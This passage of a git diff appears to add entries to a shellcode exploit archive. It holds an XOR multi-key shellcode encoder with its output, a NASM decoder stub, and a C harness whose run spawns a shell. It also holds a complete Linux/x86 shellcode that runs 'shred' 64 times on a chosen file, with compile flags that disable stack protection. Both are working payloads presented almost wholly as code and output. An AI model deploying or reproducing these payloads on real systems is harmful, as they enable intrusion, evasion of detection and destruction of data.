+encoded2 = "" + +print 'Encoded shellcode ...' + +i = 1 +for x in bytearray(shellcode) : + + if i == 11: + i = 1 + y = x^i + encoded += '\\x' + encoded += '%02x' % y + + encoded2 += '0x' + encoded2 += '%02x,' %y + + i = i + 0x01 + +print encoded + +print encoded2 + +print 'Len: %d' % len(bytearray(shellcode)) + + +######################################### Encoded Shellcode ############################################### + +socket@ubuntu:~/Assesments/4$ python encoder-xor-multiple-keys.py +Encoded shellcode ... +\x30\xc2\x53\x6c\x2a\x29\x74\x60\x61\x25\x63\x6b\x6d\x8d\xe6\x56\x8e\xea\x5a\x83\xe0\xb2\x08\xc9\x85 +0x30,0xc2,0x53,0x6c,0x2a,0x29,0x74,0x60,0x61,0x25,0x63,0x6b,0x6d,0x8d,0xe6,0x56,0x8e,0xea,0x5a,0x83,0xe0,0xb2,0x08,0xc9,0x85, +Len: 25 + + +#################################### decoder-xor-multiple-keys.nasm ############################################### + +; Filename: xor-decoder-multiple-keys.nasm +; Author: Xavi Beltran +; Date: 05/05/2019 + +global _start + +section .text +_start: + + xor edx, edx + mov dl, 1 + jmp short call_decoder + +decoder: + pop esi + xor ecx, ecx + mov cl, 25 + + +decode: + cmp dl, 0x0b + jz xor_counter + xor byte [esi], dl + inc esi + inc dl + loop decode + + jmp short Shellcode + +xor_counter: + mov dl, 1 + jmp decode + +call_decoder: + + call decoder + Shellcode: db 0x30,0xc2,0x53,0x6c,0x2a,0x29,0x74,0x60,0x61,0x25,0x63,0x6b,0x6d,0x8d,0xe6,0x56,0x8e,0xea,0x5a,0x83,0xe0,0xb2,0x08,0xc9,0x85 + + +############################################### final shellcode ################################################ + +socket@ubuntu:~/Assesments/4$ ./objdump_parser.sh decoder-xor-multiple-keys +"\x31\xd2\xb2\x01\xeb\x17\x5e\x31\xc9\xb1\x19\x80\xfa\x0b\x74\x09\x30\x16\x46\xfe\xc2\xe2\xf4\xeb\x09\xb2\x01\xeb\xee\xe8\xe4\xff\xff\xff\x30\xc2\x53\x6c\x2a\x29\x74\x60\x61\x25\x63\x6b\x6d\x8d\xe6\x56\x8e\xea\x5a\x83\xe0\xb2\x08\xc9\x85" +socket@ubuntu:~/Assesments/4$ ./shellcode +Shellcode Length: 59 +$ whoami +socket + +socket@ubuntu:~/Assesments/4$ cat shellcode.c +#include +#include + +unsigned char code[] = \ +"\x31\xd2\xb2\x01\xeb\x17\x5e\x31\xc9\xb1\x19\x80\xfa\x0b\x74\x09\x30\x16\x46\xfe\xc2\xe2\xf4\xeb\x09\xb2\x01\xeb\xee\xe8\xe4\xff\xff\xff\x30\xc2\x53\x6c\x2a\x29\x74\x60\x61\x25\x63\x6b\x6d\x8d\xe6\x56\x8e\xea\x5a\x83\xe0\xb2\x08\xc9\x85"; + +main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} \ No newline at end of file diff --git a/shellcodes/linux_x86/46801.txt b/shellcodes/linux_x86/46801.txt new file mode 100644 index 000000000..5fcdb180f --- /dev/null +++ b/shellcodes/linux_x86/46801.txt @@ -0,0 +1,76 @@ +# Exploit Title: Linux/x86 shred file (72 bytes) +# Google Dork: None +# Date: 02.05.2019 +# Exploit Author: strider +# Vendor Homepage: None +# Software Link: None +# Tested on: Debian 9 Stretch i386/ Kali Linux i386 +# CVE : None +# Shellcode Length: 72 +------------------------------[Description]--------------------------------- + +This shellcode shred files 64 times + +replace test.txt with any file you want. + +-----------------------------[Shellcode Dump]--------------------------------- +section .text + +global _start + +_start: + xor eax, eax + push eax + + push word 0x6465 + push 0x7268732f + push 0x6e69622f + push 0x7273752f + + mov ebx, esp + jmp short _file + +_params: + pop ecx + mov ebp, ecx + xor ecx, ecx + push eax + push 0x6e7a762d + mov esi, esp + + push eax + push word 0x3436 + xor edx, edx + mov edi, esp + +_exec: + push eax + push ebp + push edi + push esi + push ebx + mov ecx, esp + mov al, 0xb + + int 0x80 + +_file: + call _params + string db "test.txt"; replace test.txt with any file you want + + -----------------------------[Compile]--------------------------------------------- + gcc -m32 -fno-stack-protector -z execstack -o tester tester.c + + -----------------------------[C-Code]----------------------------- + + #include + #include + + unsigned char shellcode[] = "\x31\xc0\x50\x66\x68\x65\x64\x68\x2f\x73\x68\x72\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\xeb\x21\x59\x89\xcd\x31\xc9\x50\x68\x2d\x76\x7a\x6e\x89\xe6\x50\x66\x68\x36\x34\x31\xd2\x89\xe7\x50\x55\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xda\xff\xff\xff\x74\x65\x73\x74\x2e\x74\x78\x74"; + void main() + { + printf("Shellcode Length: %d\n", strlen(shellcode)); + + int (*ret)() = (int(*)())shellcode; + ret(); + } \ No newline at end of file